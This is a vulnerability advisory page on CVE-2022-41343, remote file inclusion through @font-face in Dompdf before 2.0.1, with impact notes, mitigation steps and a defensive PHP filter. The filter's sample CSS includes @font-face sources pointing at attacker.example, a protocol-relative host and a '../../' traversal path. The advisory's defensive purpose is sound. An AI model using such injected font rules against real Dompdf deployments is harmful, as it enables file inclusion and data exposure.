CVE-2022-41343: remote file inclusion in Dompdf before 2.0.1
registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.
AI Analysis
Technical Summary
CVE-2022-41343 is a high-severity vulnerability in Dompdf, a widely used PHP library that renders HTML and CSS to PDF. The flaw is in the registerFont method of FontMetrics.php in releases before 2.0.1. When a stylesheet contains an @font-face rule, Dompdf resolves the src URI and registers the referenced font file for use in the document. In vulnerable versions the URI check that is supposed to reject disallowed sources (for example a remote URI when remote access is not permitted) records the failure but does not halt font registration, so processing continues with the attacker-supplied URI and the referenced file is still included. Because that URI is attacker-controlled, the issue is classed as remote file inclusion (RFI). The CVSS 3.1 vector recorded for it (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, base score 7.5) rates the confidentiality impact high and integrity and availability as unaffected, which is why the entry is rated high rather than critical; exploitation requires neither authentication nor user interaction. No exploitation in the wild had been reported at the time of this analysis. The realistic attack surface is any application that lets users influence the HTML or CSS that Dompdf renders, such as invoice, report or ticket generators that embed user-supplied content; a successful inclusion exposes whatever the rendering process can read and, depending on how the included content is handled, can be a step toward further compromise of the web server.
Potential Impact
For European organizations, the impact of CVE-2022-41343 can be significant, especially for those relying on web applications that utilize Dompdf for PDF generation. The vulnerability allows remote attackers to include arbitrary remote files, potentially leading to unauthorized disclosure of sensitive data such as personal information, financial records, or intellectual property. This is particularly concerning under the GDPR framework, where data breaches can result in substantial fines and reputational damage. Confidentiality breaches could undermine trust in services, especially in sectors like finance, healthcare, and government where document generation is common. Although the vulnerability does not directly affect integrity or availability, the ability to include remote files could be a stepping stone for further attacks, such as remote code execution or lateral movement within networks. The lack of required authentication and user interaction means attackers can exploit this vulnerability at scale, increasing the risk to European organizations with exposed web services using vulnerable Dompdf versions.
Mitigation Recommendations
The fix is to upgrade Dompdf to 2.0.1 or later, where registerFont stops when the URI check fails; for Composer-managed projects that is `composer require dompdf/dompdf:^2.0.1` followed by a redeploy, and `composer show dompdf/dompdf` confirms the installed version. Where the upgrade cannot ship immediately, reduce exposure rather than rely on detection alone: never pass user-controlled HTML or CSS to Dompdf unfiltered, strip or reject @font-face rules whose src is anything other than an allowlisted local font file, and run Dompdf with isRemoteEnabled set to false and a chroot confined to the font directory. Keep the font directory and font cache outside the web root so that whatever is written there is never served back. Egress filtering from the rendering host to a short allowlist blocks the fetch of attacker-hosted files and also makes attempts visible: an outbound connection from the PDF worker to an unknown host is a strong signal, so log and alert on it. WAF signatures for @font-face rules with remote URLs offer only temporary, bypassable cover, because CSS can be encoded, split across imports, or injected through HTML the WAF does not parse as CSS. Finally, review PDF generation workflows to remove dependence on external resources and run the renderer in a sandboxed, low-privilege process so that a successful inclusion exposes as little as possible.
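The two controls that can be applied before any user-controlled CSS reaches Dompdf, as an added example that is not Dompdf's own code and not part of the original advisory: a pre-filter that drops every @font-face rule whose src is not a bare relative path to a local font file, and a hardened Dompdf\Options object (isRemoteEnabled off, chroot and font paths confined to one directory, embedded PHP off). PHP 8.0 or later is assumed; the function names, the sample CSS and the allowed font extensions are assumptions for this illustration. The options are defence in depth only: the page's own point is that vulnerable versions continue past a failed URI check, so they do not replace the upgrade.

```php
<?php
declare(strict_types=1);

// Added example, not Dompdf's own code. Function names, sample CSS and the
// allowed extensions are assumptions for this illustration (PHP >= 8.0).

/** Return every url(...) target found inside @font-face blocks of $css. */
function fontFaceSources(string $css): array
{
    $sources = [];
    // One match per "@font-face { ... }" block; font-face bodies contain no nested braces.
    if (preg_match_all('/@font-face\s*\{([^}]*)\}/i', $css, $blocks)) {
        foreach ($blocks[1] as $body) {
            // url("x"), url('x') and unquoted url(x)
            if (preg_match_all('/url\(\s*([\'"]?)([^\'")]+)\1\s*\)/i', $body, $urls)) {
                foreach ($urls[2] as $u) {
                    $sources[] = trim($u);
                }
            }
        }
    }
    return $sources;
}

/**
 * A font source is acceptable only as a bare relative path to a font file:
 * no URI scheme at all (http:, https:, file:, data: ...), no protocol-relative
 * "//host/...", and no ".." segment.
 */
function isAllowedFontSource(string $src): bool
{
    if (preg_match('/^[a-z][a-z0-9+.\-]*:/i', $src)) {
        return false;                       // any scheme is rejected
    }
    if (str_starts_with($src, '//')) {
        return false;                       // protocol-relative URL
    }
    foreach (explode('/', str_replace('\\', '/', $src)) as $segment) {
        if ($segment === '..') {
            return false;                   // directory traversal
        }
    }
    return (bool) preg_match('/^[A-Za-z0-9_\-.\/]+\.(ttf|otf|woff2?)$/i', $src);
}

/**
 * Drop every @font-face block that references a disallowed source.
 * Returns [filtered CSS, list of rejected sources] so the caller can log them.
 */
function stripUntrustedFontFaces(string $css): array
{
    $rejected = [];
    $clean = preg_replace_callback(
        '/@font-face\s*\{[^}]*\}/i',
        function (array $m) use (&$rejected): string {
            foreach (fontFaceSources($m[0]) as $src) {
                if (!isAllowedFontSource($src)) {
                    $rejected[] = $src;
                    return '';              // remove the whole rule
                }
            }
            return $m[0];                   // keep rules that only use local files
        },
        $css
    );
    return [$clean, $rejected];
}

/**
 * Hardened Dompdf options: no remote fetches, local file access confined to
 * the font directory, no embedded PHP. Returns null when Dompdf is not
 * installed so this script still runs stand-alone. Defence in depth only;
 * it does not replace upgrading to 2.0.1 or later.
 */
function hardenedDompdfOptions(string $fontDir): ?object
{
    if (!class_exists(\Dompdf\Options::class)) {
        return null;
    }
    $options = new \Dompdf\Options();
    $options->setIsRemoteEnabled(false);
    $options->setChroot($fontDir);
    $options->setFontDir($fontDir);
    $options->setFontCache($fontDir);
    $options->setIsPhpEnabled(false);
    return $options;
}

// Constructed sample input standing in for user-supplied CSS.
$userCss = <<<'CSS'
@font-face { font-family: "Evil"; src: url("http://attacker.example/font.ttf"); }
@font-face { font-family: "Sneaky"; src: url(//attacker.example/font.woff); }
@font-face { font-family: "Walk"; src: url('../../uploads/font.ttf'); }
@font-face { font-family: "Local"; src: url(fonts/DejaVuSans.ttf); }
body { font-family: "Local", serif; }
CSS;

[$cleanCss, $rejected] = stripUntrustedFontFaces($userCss);
foreach ($rejected as $src) {
    fwrite(STDERR, "rejected @font-face source: {$src}\n");
}
echo $cleanCss;                              // only the "Local" rule and body { } survive
$options = hardenedDompdfOptions(__DIR__ . '/fonts');
```

Run it with `php filter.php`; the three rules pointing at a remote host, a protocol-relative host and a traversal path are reported on stderr and removed, and only the local DejaVuSans rule is passed on. The allowlist is deliberately strict (relative path, font extension, no scheme) rather than a denylist of known-bad schemes, since any scheme Dompdf's own check would reject is exactly the input this CVE concerns.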
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2022-09-25T00:00:00.000Z
- Cisa Enriched: true
- Cvss Version: 3.1
- State: PUBLISHED
Added to database: 5/22/2025, 2:52:09 PM
Last enriched: 7/8/2025, 10:13:35 AM
Last updated: 8/15/2025, 6:36:27 AM